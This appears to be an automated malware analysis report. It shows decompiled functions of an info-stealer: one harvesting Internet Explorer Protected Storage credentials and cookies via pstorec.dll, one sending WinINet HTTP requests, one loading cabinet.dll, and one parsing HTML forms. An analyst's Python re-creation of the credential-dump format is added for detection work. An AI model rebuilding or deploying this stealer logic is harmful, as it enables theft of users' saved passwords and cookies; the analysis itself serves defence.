    				short _t157;
    				char* _t161;
    				int _t162;
    				short _t165;
    				char* _t167;
    				signed char _t178;
    				signed int _t179;
    				short* _t181;
    				intOrPtr* _t183;
    				intOrPtr* _t185;
    				intOrPtr* _t187;
    				short _t200;
    				char _t203;
    				short _t221;
    				short _t227;
    				void* _t228;
    				void* _t229;
    				short* _t230;
    				short _t233;
    				short _t235;
    
    				_t123 = GetProcAddress(LoadLibraryA("pstorec.dll"), "PStoreCreateInstance");
    				_t233 = 0;
    				_v84 = 0;
    				_v36 = 0x10;
    				_v32 = 2;
    				_v28 = 0;
    				_v24 = 0;
    				_v92 = 0;
    				_v76 = 0;
    				if(_t123 == 0) {
    					L46:
    					_v68 = 0;
    					_v72 = 0;
    					if(E004046AA(_t192,  &_v72, 1,  &_v68) != 0) {
    						_t226 = _v72;
    						if(_v72 > 0) {
    							_t133 = E0040CEF9(_t226 + _t233 + 0x32, _v92);
    							if(_t133 != 0) {
    								_v92 = _t133;
    								E0040CF7C(E0040CF7C(_t133 + _t233, "\nIE Cookies:\n", 0xd) + 0xd, _v80, _t226);
    							}
    							E0040CF40(_v68);
    						}
    					}
    					_t126 = _v92;
    					_t249 = _v92;
    					if(_v92 == 0) {
    						_t126 = "Empty";
    					}
    					E00410EC7(_t192, _t208, _t249, 1, 0, 0, L"Protected Storage:\n\n%S", _t126);
    					E0040CF40(_v92);
    					E004046AA(_t192, 0, 0, 0);
    					E00404BC8(1);
    					return 1;
    				}
    				_push(0);
    				_push(0);
    				_push(0);
    				_t192 =  &_v84;
    				_push( &_v84);
    				if( *_t123() != 0) {
    					goto L46;
    				}
    				_t140 = _v100;
    				if(_t140 == 0) {
    					goto L46;
    				}
    				_t208 =  &_v72;
    				_push( &_v72);
    				_push(0);
    				_push(0);
    				_push(_t140);
    				if( *((intOrPtr*)( *_t140 + 0x38))() != 0) {
    					L45:
    					_t142 = _v116;
    					_t192 =  *_t142;
    					 *((intOrPtr*)( *_t142 + 8))(_t142);
    					goto L46;
    				} else {
    					while(1) {
    						_t144 = _v88;
    						_push(0);
    						_t208 =  &_v84;
    						_push( &_v84);
    						_push(1);
    						_push(_t144);
    						if( *((intOrPtr*)( *_t144 + 0xc))() != 0) {
    							break;
    						}
    						__eflags = _v100 - 0xe161255a;
    						if(_v100 != 0xe161255a) {
    							continue;
    						}
    						_t146 = _v132;
    						_t147 =  *((intOrPtr*)( *_t146 + 0x3c))(_t146, 0,  &_v100, 0,  &_v108);
    						__eflags = _t147;
    						if(_t147 != 0) {
    							continue;
    						}
    						while(1) {
    							_t148 = _v128;
    							_t149 =  *((intOrPtr*)( *_t148 + 0xc))(_t148, 1,  &_v88, 0);
    							__eflags = _t149;
    							if(_t149 != 0) {
    								break;
    							}
    							_t150 = _v168;
    							_t151 =  *((intOrPtr*)( *_t150 + 0x54))(_t150, 0,  &_v136,  &_v104, 0,  &_v148);
    							__eflags = _t151;
    							if(_t151 != 0) {
    								continue;
    							}
    							_v188 = 0;
    							_v204 = 0;
    							while(1) {
    								_t152 = _v172;
    								_t153 =  *((intOrPtr*)( *_t152 + 0xc))(_t152, 1,  &_v196, 0);
    								__eflags = _t153;
    								if(_t153 != 0) {
    									break;
    								}
    								_t227 = StrStrW(_v212, L":StringData");
    								__eflags = _t227;
    								if(_t227 == 0) {
    									continue;
    								}
    								__eflags =  *(_t227 + 0x16);
    								if( *(_t227 + 0x16) != 0) {
    									continue;
    								}
    								__eflags = _t227 - _v216;
    								if(_t227 == _v216) {
    									continue;
    								}
    								_t155 = _v212;
    								_t156 =  *((intOrPtr*)( *_t155 + 0x44))(_t155, 0,  &_v180,  &_v148, _v216,  &_v208,  &_v224,  &_v164, 0x10);
    								__eflags = _t156;
    								if(_t156 != 0) {
    									continue;
    								}
    								_t157 = _v244;
    								__eflags = _t157 - 2;
    								if(_t157 <= 2) {
    									continue;
    								}
    								__eflags = _t157;
    								if(_t157 == 0) {
    									continue;
    								}
    								_t221 = E0040CF2D(_t157);
    								_v232 = _t221;
    								__eflags = _t221;
    								if(_t221 == 0) {
    									continue;
    								}
    								 *_t227 = 0;
    								_t200 = _v244;
    								_t161 =  &(_v260[_t200]);
    								_t235 = 0;
    								_t228 = 0;
    								__eflags =  *(_t161 - 1);
    								if( *(_t161 - 1) != 0) {
    									L29:
    									__eflags = _t200;
    									if(_t200 <= 0) {
    										L34:
    										__eflags =  *((char*)(_t235 + _t221 - 1)) - 0x7c;
    										if( *((char*)(_t235 + _t221 - 1)) == 0x7c) {
    											_t235 = _t235 - 1;
    											__eflags = _t235;
    										}
    										_t162 = E0040D3D8(_v252);
    										_v236 = _t162;
    										_t229 = _t162 + _t235 + _v240;
    										_t60 = _t229 + 6; // 0x6
    										_t165 = E0040CEF9(_t60, _v256);
    										_v264 = _t165;
    										__eflags = _t165;
    										if(_t165 != 0) {
    											_v256 = _t165;
    											_t167 = _t165 + _v240;
    											_v260 = _t167;
    											WideCharToMultiByte(0, 0, _v252, _v236, _t167, _v236, 0, 0);
    											_v260 =  &(_v260[_v236]);
    											 *_v260 = 0x20;
    											_v260[1] = 0x3d;
    											_v260[2] = 0x20;
    											_v260 =  &(_v260[3]);
    											E0040CF7C(_v260, _v232, _t235);
    											 *((char*)(_t235 + _v272)) = 0xd;
    											 *((char*)(_t235 + _v272 + 1)) = 0xa;
    											_t230 = _t229 + 5;
    											__eflags = _t230;
    											 *((char*)(_t235 + _v272 + 2)) = 0;
    											_v252 = _t230;
    										}
    										E0040CF40(_v232);
    										_t233 = _v244;
    										continue;
    									} else {
    										goto L30;
    									}
    									do {
    										L30:
    										_t178 =  *((intOrPtr*)(_t228 + _v260));
    										__eflags = _t178;
    										if(_t178 != 0) {
    											_t179 = _t178 & 0x000000ff;
    										} else {
    											_t179 = 0x7c;
    										}
    										 *(_t228 + _t221) = _t179;
    										_t228 = _t228 + 1;
    										_t235 = _t235 + 1;
    										__eflags = _t228 - _v244;
    									} while (_t228 < _v244);
    									goto L34;
    								}
    								__eflags =  *(_t161 - 2);
    								if( *(_t161 - 2) != 0) {
    									goto L29;
    								}
    								__eflags = _t200;
    								if(_t200 <= 0) {
    									goto L34;
    								} else {
    									goto L20;
    								}
    								do {
    									L20:
    									_t181 =  &(_v260[_t228]);
    									_t203 =  *_t181;
    									__eflags = _t203;
    									if(_t203 != 0) {
    										__eflags = _t181[0];
    										L24:
    										if(__eflags <= 0) {
    											 *(_t235 + _t221) = _t203;
    										} else {
    											WideCharToMultiByte(0, 0, _t181, 1, _t235 + _t221, 1, 0, 0);
    											_t221 = _v232;
    										}
    										goto L27;
    									}
    									__eflags = _t181[0];
    									if(__eflags != 0) {
    										goto L24;
    									}
    									 *(_t235 + _t221) = 0x7c;
    									L27:
    									_t228 = _t228 + 2;
    									_t235 = _t235 + 1;
    									__eflags = _t228 - _v244;
    								} while (_t228 < _v244);
    								goto L34;
    							}
    							_t183 = _v188;
    							 *((intOrPtr*)( *_t183 + 8))(_t183);
    						}
    						_t185 = _v144;
    						 *((intOrPtr*)( *_t185 + 8))(_t185);
    					}
    					_t187 = _v104;
    					 *((intOrPtr*)( *_t187 + 8))(_t187);
    					goto L45;
    				}
    			}
    Instruction addresses (one per line of the function body above, in the same order)
    0x00404820
    0x00404828
    0x0040482a
    0x0040482e
    0x00404836
    0x0040483e
    0x00404842
    0x00404846
    0x0040484a
    0x00404850
    0x00404b26
    0x00404b31
    0x00404b35
    0x00404b40
    0x00404b42
    0x00404b48
    0x00404b52
    0x00404b59
    0x00404b5d
    0x00404b77
    0x00404b77
    0x00404b80
    0x00404b80
    0x00404b48
    0x00404b85
    0x00404b89
    0x00404b8d
    0x00404b8f
    0x00404b8f
    0x00404b9e
    0x00404baa
    0x00404bb3
    0x00404bba
    0x00404bc7
    0x00404bc7
    0x00404856
    0x00404857
    0x00404858
    0x00404859
    0x0040485d
    0x00404862
    0x00000000
    0x00000000
    0x00404868
    0x0040486e
    0x00000000
    0x00000000
    0x00404876
    0x0040487a
    0x0040487b
    0x0040487c
    0x0040487d
    0x00404883
    0x00404b1c
    0x00404b1c
    0x00404b20
    0x00404b23
    0x00000000
    0x00404889
    0x00404af8
    0x00404af8
    0x00404afe
    0x00404aff
    0x00404b03
    0x00404b04
    0x00404b06
    0x00404b0c
    0x00000000
    0x00000000
    0x0040488e
    0x00404896
    0x00000000
    0x00000000
    0x0040489c
    0x004048af
    0x004048b2
    0x004048b4
    0x00000000
    0x00000000
    0x00404ad4
    0x00404ad4
    0x00404ae3
    0x00404ae6
    0x00404ae8
    0x00000000
    0x00000000
    0x004048bf
    0x004048d7
    0x004048da
    0x004048dc
    0x00000000
    0x00000000
    0x004048e2
    0x004048e6
    0x00404ab0
    0x00404ab0
    0x00404abf
    0x00404ac2
    0x00404ac4
    0x00000000
    0x00000000
    0x004048fe
    0x00404900
    0x00404902
    0x00000000
    0x00000000
    0x00404908
    0x0040490c
    0x00000000
    0x00000000
    0x00404912
    0x00404916
    0x00000000
    0x00000000
    0x0040491c
    0x00404943
    0x00404946
    0x00404948
    0x00000000
    0x00000000
    0x0040494e
    0x00404952
    0x00404955
    0x00000000
    0x00000000
    0x0040495b
    0x0040495d
    0x00000000
    0x00000000
    0x00404968
    0x0040496a
    0x0040496e
    0x00404970
    0x00000000
    0x00000000
    0x00404978
    0x0040497b
    0x00404983
    0x00404985
    0x00404987
    0x00404989
    0x0040498c
    0x004049da
    0x004049da
    0x004049dc
    0x004049fc
    0x004049fc
    0x00404a01
    0x00404a03
    0x00404a03
    0x00404a03
    0x00404a08
    0x00404a15
    0x00404a1b
    0x00404a1e
    0x00404a21
    0x00404a26
    0x00404a2a
    0x00404a2c
    0x00404a34
    0x00404a38
    0x00404a41
    0x00404a4b
    0x00404a55
    0x00404a5d
    0x00404a64
    0x00404a71
    0x00404a75
    0x00404a7e
    0x00404a87
    0x00404a8f
    0x00404a98
    0x00404a98
    0x00404a9b
    0x00404a9f
    0x00404a9f
    0x00404aa7
    0x00404aac
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004049de
    0x004049de
    0x004049e2
    0x004049e5
    0x004049e7
    0x004049ee
    0x004049e9
    0x004049eb
    0x004049eb
    0x004049f1
    0x004049f4
    0x004049f5
    0x004049f6
    0x004049f6
    0x00000000
    0x004049de
    0x0040498e
    0x00404991
    0x00000000
    0x00000000
    0x00404993
    0x00404995
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00404997
    0x00404997
    0x0040499b
    0x0040499d
    0x0040499f
    0x004049a1
    0x004049ae
    0x004049b1
    0x004049b1
    0x004049cc
    0x004049b3
    0x004049c0
    0x004049c6
    0x004049c6
    0x00000000
    0x004049b1
    0x004049a3
    0x004049a6
    0x00000000
    0x00000000
    0x004049a8
    0x004049cf
    0x004049d0
    0x004049d1
    0x004049d2
    0x004049d2
    0x00000000
    0x004049d8
    0x00404aca
    0x00404ad1
    0x00404ad1
    0x00404aee
    0x00404af5
    0x00404af5
    0x00404b12
    0x00404b19
    0x00000000
    0x00404b19

    APIs
    • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00404819
    • GetProcAddress.KERNELBASE(00000000), ref: 00404820
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: IE Cookies:$:StringData$Empty$PStoreCreateInstance$Protected Storage:%S$Z%a$pstorec.dll
    • API String ID: 2574300362-834128494
    • Opcode ID: 0c7fb418351f2dc8134a40c8f316f7ec7165bf59963b11e0c9695d4b82e46b19
    • Instruction ID: 5bf581e770d34bfdbdc9ca802bf885e90b91d6fe0bfaa60cb6b6911d6373d2c8
    • Opcode Fuzzy Hash: 0c7fb418351f2dc8134a40c8f316f7ec7165bf59963b11e0c9695d4b82e46b19
    • Instruction Fuzzy Hash: C4C18FB1208341AFD710DF64C884E6BBBE9EFC8304F04892EF685A7291D779D945CB66
    Uniqueness

    Uniqueness Score: -1.00%
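E00404803 loads pstorec.dll, enumerates Protected Storage items under the type whose GUID begins with 0xe161255a (the leading dword of the Internet Explorer type {e161255a-37c3-11d2-bcaa-00c04fd929db}), keeps only item names that end in `:StringData`, rewrites each item's data with `|` between its NUL-separated strings and emits `name = values\r\n`, the whole buffer prefixed with `Protected Storage:\n\n` (or `Empty` when nothing was collected). The following Python is an added re-creation of that formatting on constructed data, not code from the sample or from the report. The condition of the wide-character branch is not cleanly recovered in the decompilation, so the assumption made here is: a zero code unit becomes `|`, a unit below 0x100 is copied as one byte, and anything else goes through the ANSI code page one byte at a time, as the WideCharToMultiByte call with cbMultiByte = 1 would.

```python
# Re-creation in Python of how E00404803 turns a Protected Storage ":StringData"
# item into a line of its report. Added example: not code from the sample or the
# report. Constructed sample items are at the bottom.
from typing import Iterable, Optional, Tuple

SUFFIX = ":StringData"


def wanted_item(name: str) -> Optional[str]:
    """The name filter in the loop: StrStrW must find ':StringData' at the very
    end of the name (byte +0x16 after the hit is NUL) and not at the start.
    Returns the name with the suffix cut off (the sample writes a NUL at the hit)."""
    pos = name.find(SUFFIX)
    if pos <= 0 or pos + len(SUFFIX) != len(name):
        return None
    return name[:pos]


def decode_string_data(blob: bytes, ansi: str = "cp1252") -> Optional[str]:
    """The item data rewritten with '|' between its NUL-separated strings."""
    if len(blob) <= 2:                       # the loop skips items of 2 bytes or fewer
        return None
    if blob[-1] != 0 or blob[-2] != 0:
        # narrow branch (L29/L30): every byte copied, each NUL becomes '|'
        out = bytes(b if b else 0x7C for b in blob)
    else:
        # wide branch (L20): one output byte per UTF-16 code unit. Assumption for the
        # garbled condition: zero unit -> '|', unit < 0x100 copied as-is, otherwise
        # converted like WideCharToMultiByte(CP_ACP, ..., 1, ..., 1).
        parts = bytearray()
        for i in range(0, len(blob) - 1, 2):
            unit = blob[i] | (blob[i + 1] << 8)
            if unit == 0:
                parts.append(0x7C)
            elif unit < 0x100:
                parts.append(unit)
            else:
                parts += chr(unit).encode(ansi, errors="replace")[:1]
        out = bytes(parts)
    if out.endswith(b"|"):                   # L34: one trailing separator is dropped
        out = out[:-1]
    return out.decode(ansi, errors="replace")


def format_record(name: str, blob: bytes) -> Optional[str]:
    """One line of the output buffer: '<name> = <values>\\r\\n'."""
    base = wanted_item(name)
    if base is None:
        return None
    values = decode_string_data(blob)
    if values is None:
        return None
    return f"{base} = {values}\r\n"


def dump(items: Iterable[Tuple[str, bytes]]) -> str:
    """The buffer as handed to the L"Protected Storage:\\n\\n%S" formatter."""
    body = "".join(r for r in (format_record(n, b) for n, b in items) if r)
    return "Protected Storage:\n\n" + (body or "Empty")


# Constructed items (not real Protected Storage contents).
SAMPLE_ITEMS = [
    ("https://login.example-bank.test/:StringData",
     "alice\0hunter2\0".encode("utf-16-le")),   # wide data, two strings
    ("email:StringData", b"bob@example.test\0"),  # narrow data, one string
    (":StringData", b"x\0y\0"),                   # skipped: nothing before the suffix
    ("user name", "carol".encode("utf-16-le")),   # skipped: no ':StringData'
]

if __name__ == "__main__":
    print(dump(SAMPLE_ITEMS))
```

The narrow/wide decision is made only from the last two bytes of the item, so a UTF-16 value without its terminating NUL is treated as narrow and comes out with a `|` after every character; that artefact is a useful fingerprint when such a dump turns up in captured C2 traffic.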

    C-Code - Quality: 88%
    			E0040BDB5(long _a4) {
    				void _v8;
    				void _v60;
    				void _v1084;
    				void* __ebx;
    				void* __edi;
    				char* _t62;
    				char* _t67;
    				int _t73;
    				intOrPtr _t78;
    				intOrPtr _t82;
    				void* _t101;
    				signed int _t103;
    				char* _t108;
    				void* _t109;
    				char* _t110;
    				char** _t113;
    
    				E00410635();
    				_t113 = _a4;
    				_t113[3] = 0;
    				_t113[1][8] = InternetOpenA( *0x413488, 0, 0, 0, 0);
    				_t62 = _t113[1];
    				_t101 = _t62[8];
    				if(_t101 == 0) {
    					L19:
    					return _t62;
    				}
    				_t113[1][0xc] = InternetConnectA(_t101, _t113[2][0x10], _t113[2][0x18] & 0x0000ffff, 0, 0, 3, 0, 0);
    				_t62 = _t113[1];
    				if(_t62[0xc] == 0) {
    					goto L19;
    				}
    				_push(_t109);
    				_t110 = E0040A2AA(0,  *_t113, _t109, _t113[2][0x2c]);
    				_t67 = _t113[2];
    				if(_t67[0xc] != 4) {
    					_t103 = 0;
    				} else {
    					_t103 = 0x800000;
    				}
    				_t108 = _t110;
    				if(_t110 == 0) {
    					_t108 = _t67[0x2c];
    				}
    				_t113[1][0x10] = HttpOpenRequestA(_t113[1][0xc],  &(( *_t113)[0x404]), _t108, 0,  *_t113, 0, _t103 | 0x8004f200, 0);
    				E0040CF40(_t110);
    				_t73 = _t113[1];
    				if( *((intOrPtr*)(_t73 + 0x10)) != 0) {
    					_a4 = 0x31;
    					if(HttpQueryInfoA(( *_t113)[0x420], 0x80000001,  &_v60,  &_a4, 0) == 0 || _a4 == 0) {
    						_t78 =  *0x412a64; // 0x246f5a8
    					 *0x412cd8( &_v60,  *((intOrPtr*)(_t78 + 0x11c))); // lstrcpy (unresolved indirect import, identified from the APIs list below, ref 0040BEB9): falls back to the configuration string at +0x11c when the request carries no Content-Type header
    					}
    					_t82 =  *0x412a64; // 0x246f5a8
    					wnsprintfA( &_v1084, 0x3ff,  *(_t82 + 0x120),  &_v60,  *0x412c14);
    					HttpAddRequestHeadersA(_t113[1][0x10],  &_v1084, 0xffffffff, 0xa0000000);
    					InternetSetStatusCallback(_t113[1][0x10], E0040BD6C);
    					_t73 = HttpSendRequestA(_t113[1][0x10], 0, 0, ( *_t113)[0x418], ( *_t113)[0x41c]);
    					if(_t73 != 0) {
    						_a4 = 4;
    						_v8 = 0;
    						_t73 = HttpQueryInfoA(_t113[1][0x10], 0x20000013,  &_v8,  &_a4, 0);
    						if(_t73 != 0 && _v8 == 0xc8) {
    							_a4 = 0x3ff;
    							_t73 = InternetQueryOptionA(_t113[1][0x10], 0x22,  &_v1084,  &_a4);
    							if(_t73 != 0 && _a4 > 5) {
    								_t73 = E0040AF73( &_v1084, _a4);
    							}
    							_t113[3] = 1;
    						}
    					}
    				}
    				return _t73;
    			}
    Instruction addresses (one per line of the function body above, in the same order)
    0x0040bdc0
    0x0040bdc5
    0x0040bdce
    0x0040bde0
    0x0040bde3
    0x0040bde6
    0x0040bdeb
    0x0040bfa3
    0x0040bfa3
    0x0040bfa3
    0x0040be0c
    0x0040be0f
    0x0040be15
    0x00000000
    0x00000000
    0x0040be20
    0x0040be29
    0x0040be2b
    0x0040be32
    0x0040be3b
    0x0040be34
    0x0040be34
    0x0040be34
    0x0040be3d
    0x0040be41
    0x0040be43
    0x0040be43
    0x0040be6a
    0x0040be6d
    0x0040be72
    0x0040be78
    0x0040be8e
    0x0040bea3
    0x0040beaa
    0x0040beb9
    0x0040beb9
    0x0040bec9
    0x0040bee1
    0x0040befe
    0x0040bf0f
    0x0040bf2b
    0x0040bf33
    0x0040bf46
    0x0040bf4d
    0x0040bf53
    0x0040bf5b
    0x0040bf76
    0x0040bf7c
    0x0040bf84
    0x0040bf96
    0x0040bf96
    0x0040bf9b
    0x0040bf9b
    0x0040bf5b
    0x0040bf33
    0x00000000

    APIs
    • InternetOpenA.WININET(00000000,00000000,00000000,00000000), ref: 0040BDD7
    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040BE03
      • Part of subcall function 0040A2AA: lstrcpy.KERNEL32(00000001,?), ref: 0040A331
    • HttpOpenRequestA.WININET(00000004,?,00000000,00000000,?,00000000,00000000,00000000), ref: 0040BE60
    • HttpQueryInfoA.WININET(?,80000001,?,?,00000000), ref: 0040BE9B
    • lstrcpy.KERNEL32(?,?), ref: 0040BEB9
    • wnsprintfA.SHLWAPI ref: 0040BEE1
    • HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0040BEFE
    • InternetSetStatusCallback.WININET(?,Function_0000BD6C), ref: 0040BF0F
    • HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 0040BF2B
    • HttpQueryInfoA.WININET(?,20000013,?,00000031,00000000), ref: 0040BF53
    • InternetQueryOptionA.WININET(?,00000022,?,00000004), ref: 0040BF7C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Http$Internet$QueryRequest$InfoOpenlstrcpy$CallbackConnectHeadersOptionSendStatuswnsprintf
    • String ID: 1
    • API String ID: 1779409970-2212294583
    • Opcode ID: 92d497b16d25733145a1f94eef0f9c72893bcef14c4fa68f5a5e1f7939826c96
    • Instruction ID: fe3cf48f98d7f98dea3a5e6690be7ea256b15321735be77a60689f8df72db9f7
    • Opcode Fuzzy Hash: 92d497b16d25733145a1f94eef0f9c72893bcef14c4fa68f5a5e1f7939826c96
    • Instruction Fuzzy Hash: A95138B1100208AFDB20DF54DD84E9ABBE9EF08344B00847AF649D72A1D775ED91CFA8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040F5DA() {
    				struct HINSTANCE__* _t2;
    				_Unknown_base(*)()* _t7;
    				void* _t9;
    				intOrPtr _t11;
    				intOrPtr _t13;
    				intOrPtr _t14;
    				intOrPtr _t15;
    
    				_t11 =  *0x413e64; // 0x0
    				if(_t11 != 0) {
    					L9:
    					 *0x413e64 =  *0x413e64 + 1;
    					return 1;
    				} else {
    					_t2 = LoadLibraryA("cabinet.dll");
    					 *0x413e60 = _t2;
    					if(_t2 == 0) {
    						L8:
    						return 0;
    					} else {
    						 *0x41348c = GetProcAddress(_t2, "FCICreate");
    						 *0x413e50 = GetProcAddress( *0x413e60, "FCIAddFile");
    						 *0x412e58 = GetProcAddress( *0x413e60, "FCIFlushCabinet");
    						_t7 = GetProcAddress( *0x413e60, "FCIDestroy");
    						 *0x413e54 = _t7;
    						_t13 =  *0x41348c; // 0x0
    						if(_t13 == 0) {
    							L7:
    							FreeLibrary( *0x413e60);
    							goto L8;
    						} else {
    							_t14 =  *0x413e50; // 0x0
    							if(_t14 == 0) {
    								goto L7;
    							} else {
    								_t15 =  *0x412e58; // 0x0
    								if(_t15 == 0 || _t7 == 0) {
    									goto L7;
    								} else {
    									_t9 = HeapCreate(0, 0x80000, 0);
    									 *0x412e54 = _t9;
    									if(_t9 != 0) {
    										goto L9;
    									} else {
    										goto L7;
    									}
    								}
    							}
    						}
    					}
    				}
    			}

    APIs
    • LoadLibraryA.KERNEL32(cabinet.dll,00000000,0040F6C9,00000000,0040F9A3,?,00000000,00000000, L@,00410FEB,?, L@,?), ref: 0040F5EE
    • GetProcAddress.KERNEL32(00000000,FCICreate), ref: 0040F607
    • GetProcAddress.KERNEL32(FCIAddFile), ref: 0040F61D
    • GetProcAddress.KERNEL32(FCIFlushCabinet), ref: 0040F633
    • GetProcAddress.KERNEL32(FCIDestroy), ref: 0040F649
    • HeapCreate.KERNEL32(00000000,00080000,00000000), ref: 0040F677
    • FreeLibrary.KERNEL32 ref: 0040F68C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463070573.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$Library$CreateFreeHeapLoad
    • String ID: FCIAddFile$FCICreate$FCIDestroy$FCIFlushCabinet$cabinet.dll
    • API String ID: 2040708800-1163896595
    • Opcode ID: 097412f56266bd36ef309ed4c7695226415d161bcf2d39e9eb55e0e407248bec
    • Instruction ID: 9952e9b797d368164eb3b3484047c6e5c5b9c7b8af44aa4ee88c4e482b6cf487
    • Opcode Fuzzy Hash: 097412f56266bd36ef309ed4c7695226415d161bcf2d39e9eb55e0e407248bec
    • Instruction Fuzzy Hash: F8111875A453209BCB226FA0FD085DA7F65B708B03310C93AF501E26B0D6FA4A569F8C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E0040A34A(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				signed int _v9;
    				char _v16;
    				char* _v20;
    				char* _v24;
    				signed int _v28;
    				signed int _v32;
    				void* _v36;
    				char* _v40;
    				char _v1064;
    				void* _t127;
    				void* _t132;
    				char _t134;
    				signed int _t144;
    				char _t145;
    				signed int _t157;
    				char _t158;
    				char* _t159;
    				char* _t163;
    				signed int _t168;
    				intOrPtr _t169;
    				char* _t170;
    				intOrPtr _t173;
    				int _t175;
    				signed int _t178;
    				void* _t180;
    				intOrPtr _t182;
    				intOrPtr _t183;
    				intOrPtr _t186;
    				intOrPtr _t187;
    				intOrPtr _t190;
    				intOrPtr _t191;
    				void* _t193;
    				intOrPtr _t194;
    				intOrPtr* _t196;
    				char* _t197;
    				char* _t198;
    				char _t199;
    				intOrPtr _t201;
    				intOrPtr _t203;
    				void* _t216;
    				void* _t219;
    				void* _t223;
    				void* _t224;
    				void* _t226;
    				char _t227;
    				char* _t228;
    				void* _t230;
    				intOrPtr* _t233;
    				void* _t234;
    				intOrPtr _t235;
    				intOrPtr* _t236;
    				char* _t237;
    				signed int _t238;
    				void* _t239;
    				void* _t240;
    
    				_t230 = __esi;
    				_t219 = __edi;
    				_t193 = __ebx;
    				 *0x412cd8( &_v1064, _a4);
    				_t127 = E0040D3C6( &_v1064);
    				while(1) {
    					_t127 = _t127 - 1;
    					if(_t127 == 0) {
    						break;
    					}
    					if( *((char*)(_t239 + _t127 - 0x424)) != 0x2f) {
    						continue;
    					}
    					_t201 =  *0x412a64; // 0x246f5a8
    					 *0x412cd8(_t239 + _t127 - 0x423,  *((intOrPtr*)(_t201 + 0x144)), _t219);
    					E00410635();
    					_t132 = InternetOpenA( *0x413488, 0, 0, 0, 0);
    					if(_t132 == 0 || InternetOpenUrlA(_t132,  &_v1064, 0, 0, 0x84043300, 0) == 0) {
    						L95:
    						break;
    					} else {
    						_push(_t230);
    						_t134 = E004060CC( &_v1064,  &_v36, 0xffff, _t133);
    						_v8 = _t134;
    						if(_t134 == 0) {
    							L94:
    							goto L95;
    						}
    						_t233 = _v36;
    						_push(_t193);
    						_t194 = 0;
    						_t216 = 0;
    						_t223 = "*<select " - _t233;
    						do {
    							_t203 =  *((intOrPtr*)(_t223 + _t233));
    							if(_t203 - 0x41 <= 0x19) {
    								_t203 = _t203 + 0x20;
    							}
    							if(_t203 != 0x23) {
    								__eflags = _t203 - 0x2a;
    								if(_t203 == 0x2a) {
    									_t16 = _t216 + 1; // 0x1
    									__eflags = _t16 - 9;
    									if(__eflags != 0) {
    										__eflags = _t194 - _v8;
    										if(_t194 >= _v8) {
    											goto L93;
    										}
    										_t224 = 8;
    										_t225 = _t224 - _t216;
    										__eflags = _t224 - _t216;
    										_t20 = _t216 + "<select "; // 0x4036b1
    										_t234 = _t20;
    										while(1) {
    											_t144 = E00408C0D(_t234, _t225, _v36 + _t194, _v8 - _t194,  &_v16, 0, 0);
    											__eflags = _t144;
    											if(_t144 != 0) {
    												break;
    											}
    											_t194 = _t194 + 1;
    											__eflags = _t194 - _v8;
    											if(_t194 < _v8) {
    												continue;
    											}
    											goto L93;
    										}
    										_t25 =  &_v16;
    										 *_t25 = _v16 + _t194;
    										__eflags =  *_t25;
    										L28:
    										_t145 = _v16;
    										_v28 = _v28 & 0x00000000;
    										_v32 = _v32 & 0x00000000;
    										_v8 = _v8 - _t145;
    										_t196 = _t145 + _v36;
    										_v9 = 0;
    										do {
    											_v20 = "*<option  selected";
    											_t235 = 0;
    											_t226 = 0;
    											_v20 = _v20 - _t196;
    											_t218 = _t196;
    											do {
    												_t206 = _v20[_t218];
    												if(_t206 - 0x41 <= 0x19) {
    													_t206 = _t206 + 0x20;
    												}
    												if(_t206 != 0x23) {
    													__eflags = _t206 - 0x2a;
    													if(_t206 == 0x2a) {
    														_t44 = _t226 + 1; // 0x1
    														__eflags = _t44 - 0x12;
    														if(__eflags != 0) {
    															__eflags = _t235 - _v8;
    															if(__eflags >= 0) {
    																goto L91;
    															}
    															_v20 = 0x11;
    															_t49 =  &_v20;
    															 *_t49 = _v20 - _t226;
    															__eflags =  *_t49;
    															_t51 = _t226 + "<option  selected"; // 0x74706f3c
    															_t227 = _t51;
    															while(1) {
    																_t218 = _v20;
    																_t206 = _t227;
    																_t157 = E00408C0D(_t227, _v20, _t235 + _t196, _v8 - _t235,  &_v16, 0, 0);
    																__eflags = _t157;
    																if(_t157 != 0) {
    																	break;
    																}
    																_t235 = _t235 + 1;
    																__eflags = _t235 - _v8;
    																if(__eflags < 0) {
    																	continue;
    																}
    																goto L91;
    															}
    															_t57 =  &_v16;
    															 *_t57 = _v16 + _t235;
    															__eflags =  *_t57;
    															L51:
    															_t158 = _v16;
    															_t197 = _t196 + _t158;
    															_t60 =  &_v8;
    															 *_t60 = _v8 - _t158;
    															if( *_t60 == 0) {
    																goto L91;
    															}
    															while( *_t197 != 0x3e) {
    																_t197 = _t197 + 1;
    																_t62 =  &_v8;
    																 *_t62 = _v8 - 1;
    																if( *_t62 != 0) {
    																	continue;
    																}
    																break;
    															}
    															if(_v8 == 0) {
    																goto L91;
    															}
    															_t198 = _t197 + 1;
    															_t206 = _v8 + _t198;
    															_v40 = _t198;
    															_t159 = _t198;
    															if(_t198 >= _t206) {
    																L58:
    																if(_t159 == _t206) {
    																	goto L91;
    																}
    																_t206 = _t159 - _t198;
    																if(_t159 - _t198 > 0x200) {
    																	goto L91;
    																}
    																_v8 = _v8 + _t198 - _t159;
    																_t236 = _t159 + 1;
    																_t228 = 0;
    																_v24 = "*<input *value=\"";
    																_v24 = _v24 - _t236;
    																 *_t159 = 0;
    																_v20 = 0;
    																_t218 = _t236;
    																do {
    																	_t206 = _v24[_t218];
    																	if(_t206 - 0x41 <= 0x19) {
    																		_t206 = _t206 + 0x20;
    																	}
    																	if(_t206 != 0x23) {
    																		__eflags = _t206 - 0x2a;
